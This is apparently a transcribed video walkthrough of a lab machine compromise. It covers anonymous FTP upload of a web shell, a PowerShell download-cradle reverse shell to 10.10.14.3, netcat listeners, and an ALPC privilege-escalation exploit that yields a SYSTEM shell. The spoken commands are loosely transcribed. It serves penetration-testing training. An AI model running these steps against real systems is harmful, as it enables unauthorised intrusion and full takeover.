in the desktop, so grab this, paste, and I guess we can test this. So let's just open a command prompt, cd, open up another command prompt, nclvnp 9001, and then we can just do run DLL 32, rev DLL, and call, was it DLL main we did it on? And we get a hit, but it dies immediately. Oh no, we got the shell. There we go. So we know everything works. Awesome. So we just got to upload these. So I'll call this ALPC.exe. And let's see. As example, fix.exe, payload.dll, something.rtf. So let's go cmdir, FTP. We will quit FTP, anonymous, and we'll switch to binary mode, and we will put rev.dll, put webshell.asp, and we should be able to go here, help, and find out how to run a command. So let's do shell cmd, So shell cmd c : inet pub www root upload, and we called it, do we upload ALPC.exe? revdll webshell. I don't know why I did webshell. Put ALPC.exe. So upload ALPC.exe, and we will give it c : inet pub www root upload rev.dll, and we'll call it please sub.rtf. So, whoops, I put a bunch of spaces. cmd nc lvnp 9001. See if this works. So we uploaded it. I ran the command and seeing if the command gives us anything back. Failed to copy over temporary file. Are you sure you have write permissions? Let's do shell. See if this works. Let's see. Copying. So it's trying to overwrite license.rtf with this. And we're getting a failure. We shouldn't be getting a failure. So let's see. Payload. So copying current license to setting to read write x, copying DLL. Maybe it's how this is executing it. So let's try one thing real quick. Let's do Nishang to get a reverse shell. So we can do GitHub. Oh, we put a Nishang on this. So let's do c : /tools. Nishang. And we have shells. So we have the shell we need. So let's do copy this to users ipsec desktop, conceal, paste, rev.ps1. We already have a rev.ps1, so we'll do rev2.ps1. Edit this. And we want to copy the reverse, paste. We'll do 10.10.14.3 port 9002. Looks fine. So there should be a PowerShell module. So we can do PowerShell, and then we'll just try ix new object net.web client download string 10.10.14.3 port 8000 rev2.ps1, and we'll do netcat lvnp 9002. See if this works. If not, then we'll just launch it through the web shell. So we test the grunt. We should get a hit on rev2 soon. We do not. So let's just do it through the web shell. Exit, quit, anonymous, anonymous, binary, put webshell.asp. And then we want to go here. It's rev2.ps1. Python hit. Got a hit here. So now we can go cd // inetpub www root, and then upload, and we can put the other things. So we're already in binary mode, so we can put ALPC.exe, put rev.dll, and we should be able to just execute ALPC.exe, rev.dll, lol.rtf. Is that exactly what he did? Fixed. So we need to do / every time. And we did not do netcat lvnp 9001. So hopefully it didn't send the shell yet. Which it probably did. And we probably just missed it. Let's Control-C and do it again. So go over here, rev2, internal error has occurred. Put webshell.asp, refresh, connect back. So that's my clipboard still. I do. So we can do, what is ETW? An event tracing thing? ALPC Rev DLL. So it started working. That's the Windows license thing, that LOL-RTF. So started doing it. Maybe I just didn't get enough time. Rev.dll. We'll call it ipsec.rtf. ALPC.exe, rev DLL, ipsec.rtf, / ALPC.exe, rev DLL, ipsec.rtf. Fail to copy it over. So if we do type C:\Windows system32 license.rtf, it's perfectly fine. So something is wrong where this exploit is not working. Maybe it doesn't like being executed from within PowerShell. Let's do dir. Application's still running, but everything else is wiped out. So we got to put things back. Anonymous, binary. I should just move these files out of this directory. Put rev DLL. ALPC was there still. Let's go this one. Let's try cmd.exe/c, ALPC.exe, rev.dll, ipsec.rtf. Failed to write over. Can we delete ALPC.exe? It's in use. So we have an exploit that I think is working, but it's hung. So we do task list find string ALPC task kill /PID 4296/F. So we have killed that. So we should be able to delete ALPC.exe. We can. So let's put everything back in and then move it out. ALPC.exe, put rev.dll, go here, and let's move ALPC.exe C:\users destitute documents, and move rev.dll to the same place. Then go in there, cd users destitute documents, and cmd.exe/c ALPC.exe rev.dll, And we'll do please sub.rtf. Did not close the quote. Copy, paste, close. Fail to copy over. ALPC.exe, revdll, please sub.rtf. Let's see. I'm going to revert the box, and then we're going to try it again. So, let's do that. The box is now reverted, so I'm going to FTP into it. Maybe. There we go. Anonymous. Anonymous. I'm going to change to binary mode. I'm going to put webshell.asp. Going to go over to Chrome. Refresh our shell that has a reverse shell to Nishang. We should see we got a hit on rev2 and we got a shell here. So I'm going to go to cd/inetpub www.root, and then we want upload. Make sure netcat is listening here on 9001 because that's where DLL is configured to go to. That was a mistake the last time. So now let's put alpc.exe, put rev.dll, and we will copy them to c:, to c:, users destitute documents. And we'll do the same thing with rev.dll. And then let's go into this directory. So now let's just do cmd.exe/c, alpc.exe, rev.dll, and please subscribe.rtf. And now it's taking a little longer to run. As you see down here, we have a netcat session on 9001. If we do whoami, we are NTR 30 system. So what happened before is we just put the machine in a weird state where this was not exploitable. So there it is, the ALPC exploit working. So hope you guys enjoyed it. Take care, and I'll see you all next week.